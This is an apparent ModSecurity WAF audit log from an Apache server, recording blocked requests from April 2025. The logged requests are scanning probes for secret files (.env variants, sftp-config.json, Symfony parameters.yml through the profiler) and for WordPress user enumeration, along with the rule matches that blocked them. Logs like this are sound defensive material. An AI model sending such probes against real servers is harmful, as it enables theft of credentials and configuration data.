Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745466981057842 874 (- - -)
Stopwatch2: 1745466981057842 874; combined=386, p1=347, p2=0, p3=0, p4=0, p5=39, sr=126, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1e2b2020-Z--
--5247eb66-A--
[24/Apr/2025:12:37:41 +0700] aAnOJclQo524fhbIj1zA7QAAAA8 103.236.140.4 56628 103.236.140.4 8181
--5247eb66-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 46.101.111.185
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 46.101.111.185
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--5247eb66-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5247eb66-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745473061780126 733 (- - -)
Stopwatch2: 1745473061780126 733; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5247eb66-Z--
--db5cf12c-A--
[24/Apr/2025:13:41:09 +0700] aAndBd5yz20UX9VrdZMrfgAAAFY 103.236.140.4 56552 103.236.140.4 8181
--db5cf12c-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 157.230.19.140
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 157.230.19.140
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--db5cf12c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--db5cf12c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745476869100032 860 (- - -)
Stopwatch2: 1745476869100032 860; combined=404, p1=355, p2=0, p3=0, p4=0, p5=49, sr=136, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--db5cf12c-Z--
--a4c9176c-A--
[24/Apr/2025:14:09:47 +0700] aAnju2Luk3f9kLjsdTbsIwAAAIQ 103.236.140.4 55578 103.236.140.4 8181
--a4c9176c-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.91.172
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.91.172
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--a4c9176c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a4c9176c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745478587511990 2778 (- - -)
Stopwatch2: 1745478587511990 2778; combined=1482, p1=481, p2=962, p3=0, p4=0, p5=39, sr=97, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a4c9176c-Z--
--7f3e6026-A--
[24/Apr/2025:14:09:52 +0700] aAnjwGLuk3f9kLjsdTbsJQAAAII 103.236.140.4 55602 103.236.140.4 8181
--7f3e6026-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.91.172
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.91.172
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--7f3e6026-C--
demo.sayHello
--7f3e6026-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7f3e6026-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745478592494541 6410 (- - -)
Stopwatch2: 1745478592494541 6410; combined=4878, p1=622, p2=3942, p3=32, p4=35, p5=138, sr=74, sw=109, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7f3e6026-Z--
--fbe3a76d-A--
[24/Apr/2025:15:34:14 +0700] aAn3ht5yz20UX9VrdZM2IwAAAEw 103.236.140.4 46850 103.236.140.4 8181
--fbe3a76d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.73.161.121
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.73.161.121
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: */*
--fbe3a76d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fbe3a76d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483654897902 820 (- - -)
Stopwatch2: 1745483654897902 820; combined=370, p1=330, p2=0, p3=0, p4=0, p5=40, sr=121, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fbe3a76d-Z--
--d6596e2f-A--
[24/Apr/2025:15:34:15 +0700] aAn3h95yz20UX9VrdZM2JQAAAEQ 103.236.140.4 46856 103.236.140.4 8181
--d6596e2f-B--
POST /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.73.161.136
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.73.161.136
X-Forwarded-Proto: http
Connection: close
Content-Length: 13
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
--d6596e2f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d6596e2f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483655885057 835 (- - -)
Stopwatch2: 1745483655885057 835; combined=359, p1=318, p2=0, p3=0, p4=0, p5=40, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d6596e2f-Z--
--e64ecb04-A--
[24/Apr/2025:15:34:16 +0700] aAn3iN5yz20UX9VrdZM2JwAAAEg 103.236.140.4 46862 103.236.140.4 8181
--e64ecb04-B--
GET /.env.prod HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 173.239.211.251
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 173.239.211.251
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: */*
--e64ecb04-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e64ecb04-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483656867782 679 (- - -)
Stopwatch2: 1745483656867782 679; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e64ecb04-Z--
--e4da3632-A--
[24/Apr/2025:15:34:18 +0700] aAn3islQo524fhbIj1zduAAAAAk 103.236.140.4 46872 103.236.140.4 8181
--e4da3632-B--
POST /.env.prod HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.73.161.119
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.73.161.119
X-Forwarded-Proto: http
Connection: close
Content-Length: 13
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
--e4da3632-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e4da3632-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483658346872 816 (- - -)
Stopwatch2: 1745483658346872 816; combined=351, p1=310, p2=0, p3=0, p4=0, p5=41, sr=106, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e4da3632-Z--
--48059328-A--
[24/Apr/2025:15:34:19 +0700] aAn3i_iVYlyO1xhz7yMVUgAAAMI 103.236.140.4 46874 103.236.140.4 8181
--48059328-B--
GET /.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.73.161.136
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.73.161.136
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: */*
--48059328-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--48059328-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483659153876 718 (- - -)
Stopwatch2: 1745483659153876 718; combined=286, p1=245, p2=0, p3=0, p4=0, p5=40, sr=66, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--48059328-Z--
--3454d27f-A--
[24/Apr/2025:15:34:20 +0700] aAn3jMlQo524fhbIj1zduQAAAA0 103.236.140.4 46880 103.236.140.4 8181
--3454d27f-B--
POST /.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.73.161.113
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.73.161.113
X-Forwarded-Proto: http
Connection: close
Content-Length: 13
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
--3454d27f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3454d27f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483660236176 767 (- - -)
Stopwatch2: 1745483660236176 767; combined=328, p1=289, p2=0, p3=0, p4=0, p5=38, sr=84, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3454d27f-Z--
--e7412f48-A--
[24/Apr/2025:15:34:21 +0700] aAn3jfiVYlyO1xhz7yMVUwAAAMU 103.236.140.4 46886 103.236.140.4 8181
--e7412f48-B--
GET /redmine/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 173.239.211.235
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 173.239.211.235
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: */*
--e7412f48-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e7412f48-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483661055875 838 (- - -)
Stopwatch2: 1745483661055875 838; combined=382, p1=346, p2=0, p3=0, p4=0, p5=36, sr=139, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e7412f48-Z--
--46b4f76b-A--
[24/Apr/2025:15:34:22 +0700] aAn3jslQo524fhbIj1zdvAAAABc 103.236.140.4 46892 103.236.140.4 8181
--46b4f76b-B--
POST /redmine/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 173.239.211.238
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 173.239.211.238
X-Forwarded-Proto: http
Connection: close
Content-Length: 13
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
--46b4f76b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--46b4f76b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483662266661 834 (- - -)
Stopwatch2: 1745483662266661 834; combined=342, p1=306, p2=0, p3=0, p4=0, p5=35, sr=118, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--46b4f76b-Z--
--13cf3130-A--
[24/Apr/2025:15:34:23 +0700] aAn3j8lQo524fhbIj1zdvQAAABU 103.236.140.4 46898 103.236.140.4 8181
--13cf3130-B--
GET /__tests__/test-become/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.73.161.112
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.73.161.112
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
--13cf3130-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--13cf3130-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483663283899 766 (- - -)
Stopwatch2: 1745483663283899 766; combined=285, p1=248, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--13cf3130-Z--
--f3cf9806-A--
[24/Apr/2025:15:34:24 +0700] aAn3kMlQo524fhbIj1zdvwAAABE 103.236.140.4 46908 103.236.140.4 8181
--f3cf9806-B--
POST /__tests__/test-become/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.73.161.116
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.73.161.116
X-Forwarded-Proto: http
Connection: close
Content-Length: 13
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
--f3cf9806-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f3cf9806-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483664826623 846 (- - -)
Stopwatch2: 1745483664826623 846; combined=313, p1=276, p2=0, p3=0, p4=0, p5=36, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f3cf9806-Z--
--1e92687e-A--
[24/Apr/2025:15:34:56 +0700] aAn3sN5yz20UX9VrdZM2NQAAAEc 103.236.140.4 47078 103.236.140.4 8181
--1e92687e-B--
GET /sftp-config.json HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 173.239.211.250
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 173.239.211.250
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: */*
--1e92687e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1e92687e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483696716740 765 (- - -)
Stopwatch2: 1745483696716740 765; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1e92687e-Z--
--b9bd4b37-A--
[24/Apr/2025:15:35:23 +0700] aAn3y2Luk3f9kLjsdTbwsQAAAIg 103.236.140.4 47232 103.236.140.4 8181
--b9bd4b37-B--
GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.73.161.121
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.73.161.121
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: */*
--b9bd4b37-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b9bd4b37-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483723598120 774 (- - -)
Stopwatch2: 1745483723598120 774; combined=322, p1=286, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b9bd4b37-Z--
--7493386e-A--
[24/Apr/2025:15:35:24 +0700] aAn3zGLuk3f9kLjsdTbwsgAAAII 103.236.140.4 47234 103.236.140.4 8181
--7493386e-B--
GET /_profiler/open?file=app/config/parameters.yml HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 173.239.211.251
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 173.239.211.251
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: */*
--7493386e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7493386e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483724504120 763 (- - -)
Stopwatch2: 1745483724504120 763; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7493386e-Z--
--4ecf1a0d-A--
[24/Apr/2025:15:35:25 +0700] aAn3zWLuk3f9kLjsdTbwtAAAAIc 103.236.140.4 47244 103.236.140.4 8181
--4ecf1a0d-B--
GET /app/config/parameters.yml HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.73.161.120
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.73.161.120
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
--4ecf1a0d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4ecf1a0d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483725916782 776 (- - -)
Stopwatch2: 1745483725916782 776; combined=385, p1=289, p2=0, p3=0, p4=0, p5=96, sr=126, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4ecf1a0d-Z--
--19a19f3d-A--
[24/Apr/2025:15:35:26 +0700] aAn3zmLuk3f9kLjsdTbwtgAAAI8 103.236.140.4 47252 103.236.140.4 8181
--19a19f3d-B--
GET /config/parameters.yml HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 173.239.211.240
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 173.239.211.240
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: */*
--19a19f3d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--19a19f3d-H--
